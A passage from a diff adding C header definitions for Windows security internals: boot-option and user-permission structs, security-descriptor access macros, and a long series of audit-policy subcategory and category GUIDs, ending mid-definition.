struct _BOOT_OPTIONS { + ULONG Version; + ULONG Length; + ULONG Timeout; + ULONG CurrentBootEntryId; + ULONG NextBootEntryId; + WCHAR HeadlessRedirection[ANYSIZE_ARRAY]; +} BOOT_OPTIONS, *PBOOT_OPTIONS; + + +// +// Security APIs. +// + +typedef struct _USER_SID +{ + SID_IDENTIFIER_AUTHORITY sidAuthority; + ULONG UserGroupId; + ULONG UserId; +} USER_SID, *PUSER_SID; + + +typedef struct _USER_PERMISSION +{ + USER_SID UserSid; // identifies the user for whom you want to grant permissions to + ULONG dwAccessType; // currently, this is either ACCESS_ALLOWED_ACE_TYPE or ACCESS_DENIED_ACE_TYPE + BOOL bInherit; // the permissions inheritable? (eg a directory or reg key and you want new children to inherit this permission) + ULONG dwAccessMask; // access granted (eg FILE_LIST_CONTENTS or KEY_ALL_ACCESS, etc...) + ULONG dwInheritMask; // mask used for inheritance, usually (OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE | INHERIT_ONLY_ACE) + ULONG dwInheritAccessMask; // the inheritable access granted (eg GENERIC_ALL) +} USER_PERMISSION, *PUSER_PERMISSION; + +#define LongAlignPtr(Ptr) ((PVOID)(((ULONG_PTR)(Ptr) + 3) & -4)) +#define LongAlignSize(Size) (((ULONG)(Size) + 3) & -4) + +// +// Macros for calculating the address of the components of a security +// descriptor. This will calculate the address of the field regardless +// of whether the security descriptor is absolute or self-relative form. +// A null value indicates the specified field is not present in the +// security descriptor. +// + +#define RtlpOwnerAddrSecurityDescriptor( SD ) \ + ( ((SD)->Control & SE_SELF_RELATIVE) ? \ + ( (((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Owner == 0) ? ((PSID) NULL) : \ + (PSID)RtlOffsetToPointer((SD), ((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Owner) \ + ) : \ + (PSID)((SD)->Owner) \ + ) + +#define RtlpGroupAddrSecurityDescriptor( SD ) \ + ( ((SD)->Control & SE_SELF_RELATIVE) ? \ + ( (((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Group == 0) ? ((PSID) NULL) : \ + (PSID)RtlOffsetToPointer((SD), ((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Group) \ + ) : \ + (PSID)((SD)->Group) \ + ) + +#define RtlpSaclAddrSecurityDescriptor( SD ) \ + ( (!((SD)->Control & SE_SACL_PRESENT) ) ? \ + (PACL)NULL : \ + ( ((SD)->Control & SE_SELF_RELATIVE) ? \ + ( (((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Sacl == 0) ? ((PACL) NULL) : \ + (PACL)RtlOffsetToPointer((SD), ((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Sacl) \ + ) : \ + (PACL)((SD)->Sacl) \ + ) \ + ) + +#define RtlpDaclAddrSecurityDescriptor( SD ) \ + ( (!((SD)->Control & SE_DACL_PRESENT) ) ? \ + (PACL)NULL : \ + ( ((SD)->Control & SE_SELF_RELATIVE) ? \ + ( (((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Dacl == 0) ? ((PACL) NULL) : \ + (PACL)RtlOffsetToPointer((SD), ((SECURITY_DESCRIPTOR_RELATIVE *) (SD))->Dacl) \ + ) : \ + (PACL)((SD)->Dacl) \ + ) \ + ) + + +// +// Macro to determine if the given ID has the owner attribute set, +// which means that it may be assignable as an owner +// The GroupSid should not be marked for UseForDenyOnly. +// + +#define RtlpIdAssignableAsOwner( G ) \ + ( (((G).Attributes & SE_GROUP_OWNER) != 0) && \ + (((G).Attributes & SE_GROUP_USE_FOR_DENY_ONLY) == 0) ) + +// +// Macro to copy the state of the passed bits from the old security +// descriptor (OldSD) into the Control field of the new one (NewSD) +// + +#define RtlpPropagateControlBits( NewSD, OldSD, Bits ) \ + ( NewSD )->Control |= \ + ( \ + ( OldSD )->Control & ( Bits ) \ + ) + + +// +// Macro to query whether or not the passed set of bits are ALL on +// or not (ie, returns FALSE if some are on and not others) +// + +#define RtlpAreControlBitsSet( SD, Bits ) \ + (BOOLEAN) \ + ( \ + (( SD )->Control & ( Bits )) == ( Bits ) \ + ) + +// +// Macro to set the passed control bits in the given Security Descriptor +// + +#define RtlpSetControlBits( SD, Bits ) \ + ( \ + ( SD )->Control |= ( Bits ) \ + ) + +// +// Macro to clear the passed control bits in the given Security Descriptor +// + +#define RtlpClearControlBits( SD, Bits ) \ + ( \ + ( SD )->Control &= ~( Bits ) \ + ) + + +// +// Local Security Authority APIs. +// + +#ifdef DEFINE_GUID + +/* 0cce9210-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_SecurityStateChange_defined) + DEFINE_GUID( + Audit_System_SecurityStateChange, + 0x0cce9210, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_SecurityStateChange_defined + #endif +#endif + +/* 0cce9211-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_SecuritySubsystemExtension_defined) + DEFINE_GUID( + Audit_System_SecuritySubsystemExtension, + 0x0cce9211, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_SecuritySubsystemExtension_defined + #endif +#endif + +/* 0cce9212-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_Integrity_defined) + DEFINE_GUID( + Audit_System_Integrity, + 0x0cce9212, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_Integrity_defined + #endif +#endif + +/* 0cce9213-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_IPSecDriverEvents_defined) + DEFINE_GUID( + Audit_System_IPSecDriverEvents, + 0x0cce9213, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_IPSecDriverEvents_defined + #endif +#endif + +/* 0cce9214-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_Others_defined) + DEFINE_GUID( + Audit_System_Others, + 0x0cce9214, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_Others_defined + #endif +#endif + +/* 0cce9215-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_Logon_defined) + DEFINE_GUID( + Audit_Logon_Logon, + 0x0cce9215, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_Logon_defined + #endif +#endif + +/* 0cce9216-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_Logoff_defined) + DEFINE_GUID( + Audit_Logon_Logoff, + 0x0cce9216, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_Logoff_defined + #endif +#endif + +/* 0cce9217-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_AccountLockout_defined) + DEFINE_GUID( + Audit_Logon_AccountLockout, + 0x0cce9217, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_AccountLockout_defined + #endif +#endif + +/* 0cce9218-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_IPSecMainMode_defined) + DEFINE_GUID( + Audit_Logon_IPSecMainMode, + 0x0cce9218, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_IPSecMainMode_defined + #endif +#endif + +/* 0cce9219-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_IPSecQuickMode_defined) + DEFINE_GUID( + Audit_Logon_IPSecQuickMode, + 0x0cce9219, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_IPSecQuickMode_defined + #endif +#endif + +/* 0cce921a-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_IPSecUserMode_defined) + DEFINE_GUID( + Audit_Logon_IPSecUserMode, + 0x0cce921a, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_IPSecUserMode_defined + #endif +#endif + +/* 0cce921b-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_SpecialLogon_defined) + DEFINE_GUID( + Audit_Logon_SpecialLogon, + 0x0cce921b, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_SpecialLogon_defined + #endif +#endif + +/* 0cce921c-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_Others_defined) + DEFINE_GUID( + Audit_Logon_Others, + 0x0cce921c, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_Others_defined + #endif +#endif + +/* 0cce921d-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_FileSystem_defined) + DEFINE_GUID( + Audit_ObjectAccess_FileSystem, + 0x0cce921d, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_FileSystem_defined + #endif +#endif + +/* 0cce921e-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Registry_defined) + DEFINE_GUID( + Audit_ObjectAccess_Registry, + 0x0cce921e, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Registry_defined + #endif +#endif + +/* 0cce921f-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Kernel_defined) + DEFINE_GUID( + Audit_ObjectAccess_Kernel, + 0x0cce921f, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Kernel_defined + #endif +#endif + +/* 0cce9220-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Sam_defined) + DEFINE_GUID( + Audit_ObjectAccess_Sam, + 0x0cce9220, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Sam_defined + #endif +#endif + +/* 0cce9221-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_CertificationServices_defined) + DEFINE_GUID( + Audit_ObjectAccess_CertificationServices, + 0x0cce9221, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_CertificationServices_defined + #endif +#endif + +/* 0cce9222-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_ApplicationGenerated_defined) + DEFINE_GUID( + Audit_ObjectAccess_ApplicationGenerated, + 0x0cce9222, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_ApplicationGenerated_defined + #endif +#endif + +/* +The Audit_ObjectAccess_Handle sub-category behaves different from the other sub-categories. +For handle based audits to be generated (Open handle AuditId: 0x1230, Close handle AuditId: +0x1232), the corresponding object sub-category AND Audit_ObjectAccess_Handle must be +enabled. For eg, to generate handle based audits for Reg keys, both +Audit_ObjectAccess_Registry and Audit_ObjectAccess_Handle must be enabled +*/ + +/* 0cce9223-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Handle_defined) + DEFINE_GUID( + Audit_ObjectAccess_Handle, + 0x0cce9223, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Handle_defined + #endif +#endif + +/* 0cce9224-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Share_defined) + DEFINE_GUID( + Audit_ObjectAccess_Share, + 0x0cce9224, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Share_defined + #endif +#endif + +/* 0cce9225-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_FirewallPacketDrops_defined) + DEFINE_GUID( + Audit_ObjectAccess_FirewallPacketDrops, + 0x0cce9225, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_FirewallPacketDrops_defined + #endif +#endif + +/* 0cce9226-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_FirewallConnection_defined) + DEFINE_GUID( + Audit_ObjectAccess_FirewallConnection, + 0x0cce9226, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_FirewallConnection_defined + #endif +#endif + +/* 0cce9227-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_Other_defined) + DEFINE_GUID( + Audit_ObjectAccess_Other, + 0x0cce9227, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_Other_defined + #endif +#endif + +/* 0cce9228-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PrivilegeUse_Sensitive_defined) + DEFINE_GUID( + Audit_PrivilegeUse_Sensitive, + 0x0cce9228, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PrivilegeUse_Sensitive_defined + #endif +#endif + +/* 0cce9229-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PrivilegeUse_NonSensitive_defined) + DEFINE_GUID( + Audit_PrivilegeUse_NonSensitive, + 0x0cce9229, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PrivilegeUse_NonSensitive_defined + #endif +#endif + +/* 0cce922a-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PrivilegeUse_Others_defined) + DEFINE_GUID( + Audit_PrivilegeUse_Others, + 0x0cce922a, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PrivilegeUse_Others_defined + #endif +#endif + +/* 0cce922b-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DetailedTracking_ProcessCreation_defined) + DEFINE_GUID( + Audit_DetailedTracking_ProcessCreation, + 0x0cce922b, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DetailedTracking_ProcessCreation_defined + #endif +#endif + +/* 0cce922c-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DetailedTracking_ProcessTermination_defined) + DEFINE_GUID( + Audit_DetailedTracking_ProcessTermination, + 0x0cce922c, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DetailedTracking_ProcessTermination_defined + #endif +#endif + +/* 0cce922d-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DetailedTracking_DpapiActivity_defined) + DEFINE_GUID( + Audit_DetailedTracking_DpapiActivity, + 0x0cce922d, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DetailedTracking_DpapiActivity_defined + #endif +#endif + +/* 0cce922e-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DetailedTracking_RpcCall_defined) + DEFINE_GUID( + Audit_DetailedTracking_RpcCall, + 0x0cce922e, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DetailedTracking_RpcCall_defined + #endif +#endif + +/* 0cce922f-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_AuditPolicy_defined) + DEFINE_GUID( + Audit_PolicyChange_AuditPolicy, + 0x0cce922f, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_AuditPolicy_defined + #endif +#endif + +/* 0cce9230-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_AuthenticationPolicy_defined) + DEFINE_GUID( + Audit_PolicyChange_AuthenticationPolicy, + 0x0cce9230, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_AuthenticationPolicy_defined + #endif +#endif + +/* 0cce9231-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_AuthorizationPolicy_defined) + DEFINE_GUID( + Audit_PolicyChange_AuthorizationPolicy, + 0x0cce9231, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_AuthorizationPolicy_defined + #endif +#endif + +/* 0cce9232-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_MpsscvRulePolicy_defined) + DEFINE_GUID( + Audit_PolicyChange_MpsscvRulePolicy, + 0x0cce9232, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_MpsscvRulePolicy_defined + #endif +#endif + +/* 0cce9233-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_WfpIPSecPolicy_defined) + DEFINE_GUID( + Audit_PolicyChange_WfpIPSecPolicy, + 0x0cce9233, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_WfpIPSecPolicy_defined + #endif +#endif + +/* 0cce9234-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_Others_defined) + DEFINE_GUID( + Audit_PolicyChange_Others, + 0x0cce9234, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_Others_defined + #endif +#endif + +/* 0cce9235-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_UserAccount_defined) + DEFINE_GUID( + Audit_AccountManagement_UserAccount, + 0x0cce9235, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_UserAccount_defined + #endif +#endif + +/* 0cce9236-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_ComputerAccount_defined) + DEFINE_GUID( + Audit_AccountManagement_ComputerAccount, + 0x0cce9236, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_ComputerAccount_defined + #endif +#endif + +/* 0cce9237-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_SecurityGroup_defined) + DEFINE_GUID( + Audit_AccountManagement_SecurityGroup, + 0x0cce9237, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_SecurityGroup_defined + #endif +#endif + +/* 0cce9238-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_DistributionGroup_defined) + DEFINE_GUID( + Audit_AccountManagement_DistributionGroup, + 0x0cce9238, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_DistributionGroup_defined + #endif +#endif + +/* 0cce9239-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_ApplicationGroup_defined) + DEFINE_GUID( + Audit_AccountManagement_ApplicationGroup, + 0x0cce9239, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_ApplicationGroup_defined + #endif +#endif + +/* 0cce923a-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_Others_defined) + DEFINE_GUID( + Audit_AccountManagement_Others, + 0x0cce923a, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_Others_defined + #endif +#endif + +/* 0cce923b-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DSAccess_DSAccess_defined) + DEFINE_GUID( + Audit_DSAccess_DSAccess, + 0x0cce923b, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DSAccess_DSAccess_defined + #endif +#endif + +/* 0cce923c-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DsAccess_AdAuditChanges_defined) + DEFINE_GUID( + Audit_DsAccess_AdAuditChanges, + 0x0cce923c, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DsAccess_AdAuditChanges_defined + #endif +#endif + +/* 0cce923d-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Ds_Replication_defined) + DEFINE_GUID( + Audit_Ds_Replication, + 0x0cce923d, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Ds_Replication_defined + #endif +#endif + +/* 0cce923e-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Ds_DetailedReplication_defined) + DEFINE_GUID( + Audit_Ds_DetailedReplication, + 0x0cce923e, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Ds_DetailedReplication_defined + #endif +#endif + +/* 0cce923f-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountLogon_CredentialValidation_defined) + DEFINE_GUID( + Audit_AccountLogon_CredentialValidation, + 0x0cce923f, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountLogon_CredentialValidation_defined + #endif +#endif + +/* 0cce9240-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountLogon_Kerberos_defined) + DEFINE_GUID( + Audit_AccountLogon_Kerberos, + 0x0cce9240, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountLogon_Kerberos_defined + #endif +#endif + +/* 0cce9241-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountLogon_Others_defined) + DEFINE_GUID( + Audit_AccountLogon_Others, + 0x0cce9241, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountLogon_Others_defined + #endif +#endif + +/* 0cce9242-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountLogon_KerbCredentialValidation_defined) + DEFINE_GUID( + Audit_AccountLogon_KerbCredentialValidation, + 0x0cce9242, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountLogon_KerbCredentialValidation_defined + #endif +#endif + +/* 0cce9243-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_NPS_defined) + DEFINE_GUID( + Audit_Logon_NPS, + 0x0cce9243, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_NPS_defined + #endif +#endif + +/* 0cce9244-69ae-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_DetailedFileShare_defined) + DEFINE_GUID( + Audit_ObjectAccess_DetailedFileShare, + 0x0cce9244, + 0x69ae, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_DetailedFileShare_defined + #endif +#endif + +#endif // DEFINE_GUID + + +// +// All categories are named as +// + +#ifdef DEFINE_GUID + +/* 69979848-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_System_defined) + DEFINE_GUID( + Audit_System, + 0x69979848, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_System_defined + #endif +#endif + +/* 69979849-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_Logon_defined) + DEFINE_GUID( + Audit_Logon, + 0x69979849, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_Logon_defined + #endif +#endif + +/* 6997984a-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_ObjectAccess_defined) + DEFINE_GUID( + Audit_ObjectAccess, + 0x6997984a, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_ObjectAccess_defined + #endif +#endif + +/* 6997984b-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PrivilegeUse_defined) + DEFINE_GUID( + Audit_PrivilegeUse, + 0x6997984b, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PrivilegeUse_defined + #endif +#endif + +/* 6997984c-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DetailedTracking_defined) + DEFINE_GUID( + Audit_DetailedTracking, + 0x6997984c, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_DetailedTracking_defined + #endif +#endif + +/* 6997984d-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_PolicyChange_defined) + DEFINE_GUID( + Audit_PolicyChange, + 0x6997984d, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_PolicyChange_defined + #endif +#endif + +/* 6997984e-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_AccountManagement_defined) + DEFINE_GUID( + Audit_AccountManagement, + 0x6997984e, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 0x30 + ); + #ifdef INITGUID + #define Audit_AccountManagement_defined + #endif +#endif + +/* 6997984f-797a-11d9-bed3-505054503030 */ +#if !defined(INITGUID) || !defined(Audit_DirectoryServiceAccess_defined) + DEFINE_GUID( + Audit_DirectoryServiceAccess, + 0x6997984f, + 0x797a, 0x11d9, 0xbe, 0xd3, 0x50, 0x50, 0x54, 0x50, 0x30, 